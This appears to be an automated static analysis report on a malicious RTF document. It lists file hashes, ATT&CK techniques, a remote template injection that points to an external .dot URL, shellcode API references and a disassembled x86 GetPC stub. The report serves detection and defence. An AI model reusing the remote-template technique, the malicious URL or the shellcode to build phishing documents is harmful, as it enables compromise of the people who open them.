Malicious RTF — malware analysis report

Static analysis result for SHA-256 766dc9c53d06ff93…

MALICIOUS

RTF

238.3 KB Created: 2005-03-09 11:09:00 First seen: 2012-06-14
MD5: d031bc932d20ffb98c7c70dceca410b4 SHA-1: e133a3ef974bcc2d92d8111df38b267d3a51c3da SHA-256: 766dc9c53d06ff9352be3f5df7a6a1300cde01c893c1d078b92c63ecdbe53968
202 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1566.001 Spearphishing Attachment

The RTF file contains a high-severity heuristic indicating remote template injection, targeting the URL http://zz815.topcities.com//model.dot. This technique is often used to download and execute malicious content. References to VirtualAlloc, VirtualProtect, LoadLibrary, and GetProcAddress APIs suggest the file is preparing to load and run code from an external source.

Heuristics 7

  • Remote template injection (\*\template → remote URL) high CVE related RTF_REMOTE_TEMPLATE
    The RTF's \*\template destination is a remote URL/UNC path. When Word opens the document it fetches and loads that template, which can carry macros or an exploit, deliver a scriptlet/HTA, or leak NTLM credentials over UNC. Benign documents attach only a local template, so a remote \*\template target is template-injection delivery (MITRE T1221). remote \*\template target (Word fetches it on open).
  • x86 GetPC stub (CALL $+5; POP EBX) high SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EBX)
    Disassembly
    Attempted x86 opcode disassembly
    000377C9  e800000000        call 0x377ce
    000377CE  5b                pop ebx
    000377CF  b92f894000        mov ecx, 0x40892f
    000377D4  81e92c864000      sub ecx, 0x40862c
    000377DA  03d9              add ebx, ecx
    000377DC  50                push eax
    000377DD  53                push ebx
    000377DE  e83d020000        call 0x37a20
    000377E3  61                popal
    000377E4  03bddefdffff      add edi, dword ptr [ebp - 0x222]
    000377EA  8bdf              mov ebx, edi
    000377EC  833f00            cmp dword ptr [edi], 0
    000377EF  750a              jne 0x377fb
    000377F1  83c704            add edi, 4
    000377F4  b900000000        mov ecx, 0
    000377F9  eb16              jmp 0x37811
    000377FB  b901000000        mov ecx, 1
    00037800  033b              add edi, dword ptr [ebx]
    00037802  83c304            add ebx, 4
    00037805  833b00            cmp dword ptr [ebx], 0
    00037808  742d              je 0x37837
    0003780A  0113              add dword ptr [ebx], edx
    0003780C  8b33              mov esi, dword ptr [ebx]
    0003780E  037b04            add edi, dword ptr [ebx + 4]
    00037811  57                push edi
    00037812  51                push ecx
    00037813  52                push edx
    00037814  53                push ebx
    00037815  ffb536feffff      push dword ptr [ebp - 0x1ca]
    0003781B  ffb532feffff      push dword ptr [ebp - 0x1ce]
    00037821  56                push esi
    00037822  57                push edi
    00037823  ff95fafdffff      call dword ptr [ebp - 0x206]
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.debates.org/pages/trans2004a.html.[7 In RTF body
    • http://www.cuhk.edu.hk/ics/21c/supplem/essay/040313a.htmIn RTF body
    • http://www.debates.org/pages/trans2004a.htmlIn RTF body
    • http://eserver.org/marx/1848-communist.manifesto/cm4.txtIn RTF body
    • http://english.epochtimes.com/news/4-7-14/22421.html).[7In RTF body
    • http://zz815.topcities.com//model.dotIn RTF body
    • http://english.epochtimes.com/news/4-7-14/22421.htmlIn RTF body